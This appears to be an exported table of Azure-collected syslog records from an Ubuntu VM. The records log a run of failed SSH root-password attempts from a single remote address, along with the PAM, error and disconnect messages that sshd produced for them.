+8113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:03,UbuntuDevEnv,2019-06-11 18:54:02,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37747,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:03,UbuntuDevEnv,2019-06-11 18:54:02,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,37747,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:03,UbuntuDevEnv,2019-06-11 18:54:02,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 35312 ssh2 [preauth],37747,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,35312,,
+8116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:03,UbuntuDevEnv,2019-06-11 18:54:02,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 35312 ssh2,37747,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,35312,,
+8117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:06,UbuntuDevEnv,2019-06-11 18:54:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:08,UbuntuDevEnv,2019-06-11 18:54:07,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 42420 ssh2,37811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,42420,,
+8119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:11,UbuntuDevEnv,2019-06-11 18:54:10,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 42420 ssh2,37811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,42420,,
+8120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:22,UbuntuDevEnv,2019-06-11 18:54:22,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 42420 ssh2 [preauth],37811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,42420,,
+8121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:22,UbuntuDevEnv,2019-06-11 18:54:22,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 61.177.172.128 port 42420 ssh2],37811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,42420,,
+8122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:22,UbuntuDevEnv,2019-06-11 18:54:22,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:22,UbuntuDevEnv,2019-06-11 18:54:22,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,37811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:22,UbuntuDevEnv,2019-06-11 18:54:22,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 42420: Too many authentication failures [preauth],37811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,42420,,
+8125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:25,UbuntuDevEnv,2019-06-11 18:54:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:27,UbuntuDevEnv,2019-06-11 18:54:27,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 49652 ssh2,37888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,49652,,
+8127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:42,UbuntuDevEnv,2019-06-11 18:54:41,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,37888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:42,UbuntuDevEnv,2019-06-11 18:54:41,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 49652 ssh2],37888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,49652,,
+8129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:42,UbuntuDevEnv,2019-06-11 18:54:41,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 49652: Too many authentication failures [preauth],37888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,49652,,
+8130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:42,UbuntuDevEnv,2019-06-11 18:54:41,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:42,UbuntuDevEnv,2019-06-11 18:54:41,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 49652 ssh2 [preauth],37888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,49652,,
+8132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:45,UbuntuDevEnv,2019-06-11 18:54:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:54:47,UbuntuDevEnv,2019-06-11 18:54:47,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 56910 ssh2,37953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,56910,,
+8134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:02,UbuntuDevEnv,2019-06-11 18:54:59,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 61.177.172.128 port 56910 ssh2],37953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,56910,,
+8135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:02,UbuntuDevEnv,2019-06-11 18:55:02,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 56910 ssh2,37953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,56910,,
+8136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:02,UbuntuDevEnv,2019-06-11 18:55:02,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 56910: Too many authentication failures [preauth],37953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,56910,,
+8137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:02,UbuntuDevEnv,2019-06-11 18:55:02,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,37953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:02,UbuntuDevEnv,2019-06-11 18:55:02,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,37953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:02,UbuntuDevEnv,2019-06-11 18:55:02,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 56910 ssh2 [preauth],37953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,56910,,
+8140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:06,UbuntuDevEnv,2019-06-11 18:55:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:08,UbuntuDevEnv,2019-06-11 18:55:07,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 64452 ssh2,38023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,64452,,
+8142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:10,UbuntuDevEnv,2019-06-11 18:55:10,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 64452 ssh2,38023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,64452,,
+8143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:22,UbuntuDevEnv,2019-06-11 18:55:22,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,38023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:22,UbuntuDevEnv,2019-06-11 18:55:22,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 64452: Too many authentication failures [preauth],38023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,64452,,
+8145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:22,UbuntuDevEnv,2019-06-11 18:55:22,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:22,UbuntuDevEnv,2019-06-11 18:55:22,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 64452 ssh2 [preauth],38023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,64452,,
+8147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:22,UbuntuDevEnv,2019-06-11 18:55:22,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 61.177.172.128 port 64452 ssh2],38023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,64452,,
+8148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:26,UbuntuDevEnv,2019-06-11 18:55:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38112,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:28,UbuntuDevEnv,2019-06-11 18:55:27,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 7324 ssh2,38112,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,7324,,
+8150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:43,UbuntuDevEnv,2019-06-11 18:55:42,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 7324 ssh2],38112,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,7324,,
+8151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:43,UbuntuDevEnv,2019-06-11 18:55:42,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 7324 ssh2 [preauth],38112,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,7324,,
+8152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:43,UbuntuDevEnv,2019-06-11 18:55:42,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 7324: Too many authentication failures [preauth],38112,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,7324,,
+8153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:43,UbuntuDevEnv,2019-06-11 18:55:42,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38112,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:43,UbuntuDevEnv,2019-06-11 18:55:42,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,38112,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:46,UbuntuDevEnv,2019-06-11 18:55:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:55:48,UbuntuDevEnv,2019-06-11 18:55:48,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 14947 ssh2,38182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,14947,,
+8157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:01,UbuntuDevEnv,2019-06-11 18:56:00,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 61.177.172.128 port 14947 ssh2],38182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,14947,,
+8158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:03,UbuntuDevEnv,2019-06-11 18:56:03,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 14947 ssh2 [preauth],38182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,14947,,
+8159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:03,UbuntuDevEnv,2019-06-11 18:56:03,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:03,UbuntuDevEnv,2019-06-11 18:56:03,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 14947: Too many authentication failures [preauth],38182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,14947,,
+8161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:03,UbuntuDevEnv,2019-06-11 18:56:03,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 14947 ssh2,38182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,14947,,
+8162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:03,UbuntuDevEnv,2019-06-11 18:56:03,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,38182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:07,UbuntuDevEnv,2019-06-11 18:56:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:09,UbuntuDevEnv,2019-06-11 18:56:08,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 22675 ssh2,38251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,22675,,
+8165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:12,UbuntuDevEnv,2019-06-11 18:56:11,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 22675 ssh2,38251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,22675,,
+8166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:23,UbuntuDevEnv,2019-06-11 18:56:23,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 22675 ssh2 [preauth],38251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,22675,,
+8167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:23,UbuntuDevEnv,2019-06-11 18:56:23,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 22675: Too many authentication failures [preauth],38251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,22675,,
+8168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:23,UbuntuDevEnv,2019-06-11 18:56:23,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:23,UbuntuDevEnv,2019-06-11 18:56:23,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,38251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:23,UbuntuDevEnv,2019-06-11 18:56:23,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 61.177.172.128 port 22675 ssh2],38251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,22675,,
+8171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:56:27,UbuntuDevEnv,2019-06-11 18:56:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,38333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
